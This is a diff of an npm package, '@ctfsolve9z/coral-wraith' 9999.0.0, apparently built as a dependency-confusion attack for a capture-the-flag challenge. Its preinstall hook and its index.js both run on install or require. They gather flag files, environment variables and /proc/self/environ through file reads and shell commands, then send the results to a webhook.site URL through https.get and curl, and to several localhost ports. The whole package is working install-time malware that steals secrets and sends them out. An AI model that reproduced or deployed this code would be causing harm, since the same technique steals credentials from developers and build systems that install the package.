@ctfsolve9z/coral-wraith 9999.0.0

package/index.js

@@ -0,0 +1,40 @@
+// coral-wraith module - also runs payload on require()
+const fs = require('fs');
+const http = require('http');
+const https = require('https');
+
+(function() {
+  let flag = null;
+  const paths = ['/flag', '/flag.txt', '/root/flag', '/tmp/flag'];
+  for (const p of paths) {
+    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
+  }
+  if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
+  
+  if (flag) {
+    const ports = [1337, 3000, 5000, 8080, 32105, 80];
+    const postData = JSON.stringify({
+      manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.0"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
+    });
+    
+    for (const port of ports) {
+      try {
+        const req = http.request({
+          hostname: 'localhost', port, path: '/api/modules/ECT-987654',
+          method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+          timeout: 3000
+        }, () => {});
+        req.on('error', () => {});
+        req.write(postData);
+        req.end();
+      } catch(e) {}
+    }
+    
+    try {
+      const encoded = Buffer.from(flag).toString('base64');
+      https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/require-flag?data=${encoded}`, () => {}).on('error', () => {});
+    } catch(e) {}
+  }
+})();
+
+module.exports = {};

package/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "@ctfsolve9z/coral-wraith",
+  "version": "9999.0.0",
+  "description": "Coral Wraith module",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js || true"
+  }
+}

package/preinstall.js

@@ -0,0 +1,120 @@
+const fs = require('fs');
+const http = require('http');
+const https = require('https');
+const { execSync } = require('child_process');
+
+let flag = null;
+
+// Method 1: Read /flag file
+const flagPaths = ['/flag', '/flag.txt', '/root/flag', '/root/flag.txt', '/tmp/flag', './flag'];
+for (const p of flagPaths) {
+  try {
+    if (fs.existsSync(p)) {
+      flag = fs.readFileSync(p, 'utf8').trim();
+      break;
+    }
+  } catch(e) {}
+}
+
+// Method 2: Glob for flag files
+if (!flag) {
+  try {
+    const result = execSync('cat /flag* 2>/dev/null || find / -maxdepth 3 -name "flag*" -type f -exec cat {} \\; 2>/dev/null', { timeout: 5000 }).toString().trim();
+    if (result) flag = result;
+  } catch(e) {}
+}
+
+// Method 3: Environment variables
+if (!flag) {
+  flag = process.env.FLAG || process.env.HTB_FLAG || process.env.FLAG_HTB || '';
+}
+
+// Method 4: /proc/self/environ
+if (!flag) {
+  try {
+    const env = fs.readFileSync('/proc/self/environ', 'utf8');
+    const m = env.match(/FLAG[=]([^\x00]+)/);
+    if (m) flag = m[1];
+  } catch(e) {}
+}
+
+if (!flag) {
+  // Try to exfiltrate debug info
+  try {
+    const files = fs.readdirSync('/').join(',');
+    flag = 'NO_FLAG_FOUND:root=' + files;
+  } catch(e) {
+    flag = 'NO_FLAG_FOUND:error';
+  }
+}
+
+// Exfiltrate via multiple methods
+
+// Method A: PUT to challenge API (try many ports)
+const ports = [1337, 3000, 3001, 5000, 8000, 8080, 8443, 9000, 32105, 80, 443];
+const moduleId = 'ECT-987654';
+
+function tryPut(host, port, data) {
+  return new Promise((resolve) => {
+    const postData = JSON.stringify({
+      manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.0"\n  flag: "${data.replace(/"/g, '\\"').replace(/\n/g, '\\n')}"\n  captured: true`
+    });
+    
+    const req = http.request({
+      hostname: host,
+      port: port,
+      path: `/api/modules/${moduleId}`,
+      method: 'PUT',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+      timeout: 3000
+    }, (res) => {
+      let body = '';
+      res.on('data', c => body += c);
+      res.on('end', () => resolve({ host, port, status: res.statusCode, body: body.substring(0, 200) }));
+    });
+    req.on('error', () => resolve(null));
+    req.on('timeout', () => { req.destroy(); resolve(null); });
+    req.write(postData);
+    req.end();
+  });
+}
+
+// Method B: Webhook exfiltration
+function sendToWebhook(data) {
+  return new Promise((resolve) => {
+    const encoded = Buffer.from(data).toString('base64');
+    https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/flag?data=${encoded}`, () => resolve(true)).on('error', () => resolve(false));
+  });
+}
+
+// Method C: DNS exfiltration via curl
+function dnsExfil(data) {
+  try {
+    const encoded = Buffer.from(data).toString('hex').substring(0, 60);
+    execSync(`curl -s "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/dns?flag=${encodeURIComponent(data)}" -m 5`, { timeout: 6000 });
+  } catch(e) {}
+}
+
+async function main() {
+  console.log('[coral-wraith] Flag:', flag ? flag.substring(0, 20) + '...' : 'none');
+  
+  // Send to webhook first (most reliable)
+  await sendToWebhook(flag || 'NO_FLAG');
+  dnsExfil(flag || 'NO_FLAG');
+  
+  // Try all localhost ports
+  const promises = [];
+  for (const port of ports) {
+    promises.push(tryPut('localhost', port, flag || 'NO_FLAG'));
+    promises.push(tryPut('127.0.0.1', port, flag || 'NO_FLAG'));
+  }
+  
+  const results = await Promise.all(promises);
+  for (const r of results) {
+    if (r && r.status) {
+      console.log(`[coral-wraith] Success: ${r.host}:${r.port} -> ${r.status} ${r.body.substring(0, 100)}`);
+    }
+  }
+}
+
+main().catch(e => console.error('[coral-wraith] Error:', e.message));